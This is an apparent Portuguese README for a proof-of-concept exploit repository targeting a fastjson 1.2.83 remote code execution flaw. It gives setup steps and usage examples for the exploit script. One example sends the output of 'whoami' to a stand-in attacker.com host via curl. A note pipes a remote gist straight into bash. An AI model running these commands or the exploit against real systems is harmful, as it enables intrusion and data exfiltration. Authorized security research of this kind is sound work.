
CVE-2026-16723 — Updated!
CVE-2026-16723
CVE-2026-16723
Doar
Apoie a manutenção deste projeto com PayPal ou escaneando o código QR abaixo.
⚡ Uso Simples
Use este projeto apenas em ambientes seguros e autorizados, como:
- Máquinas virtuais locais
- Contêineres Docker
- Ambientes de laboratório isolados
- Ambientes de teste de penetração autorizados
Exemplo de configuração:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Exemplo de uso:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
Nota:
- ao clonar de outro projeto, você deve executar
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -ypara limpar o diretório aninhado .git - ex.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
Crédito ou Referência
- https://fearsoff.org/research/fastjson-1-2-83-rce
- https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
- https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch
📚 Repositório Educacional de Pesquisa em Segurança
Um repositório para aprender, testar e pesquisar conceitos de segurança cibernética em ambientes controlados.
⚠️ Aviso de Segurança e Legal
Propósito
Este repositório é exclusivamente para pesquisa de segurança educacional e autorizada.
Ele foi projetado para ajudar os usuários a aprender sobre:
- Vulnerabilidades de segurança
- Conceitos de sandbox e isolamento
- Codificação segura e práticas defensivas
Somente Uso Autorizado
Use este repositório apenas em ambientes onde você tenha permissão, como:
- Laboratórios pessoais ou máquinas virtuais
- Ambientes Docker ou isolados
- Testes de penetração autorizados
- Treinamento em segurança cibernética ou pesquisa acadêmica
O uso não autorizado ou ilegal é estritamente proibido.
Sem Responsabilidade
O autor e os colaboradores não são responsáveis por qualquer dano, uso indevido, problemas legais ou perdas causados por este projeto.
Ao usar este repositório, você concorda que:
- Você é responsável pelas suas próprias ações
- Você o utilizará de forma legal e ética
- O projeto é fornecido sem garantia
Uso Ético
Este projeto destina-se a:
- Pesquisa de segurança defensiva
- Educação em segurança cibernética
- Conscientização sobre vulnerabilidades
- Pesquisa segura de sistemas e software
Siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.
Contato
Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório pelo GitHub.
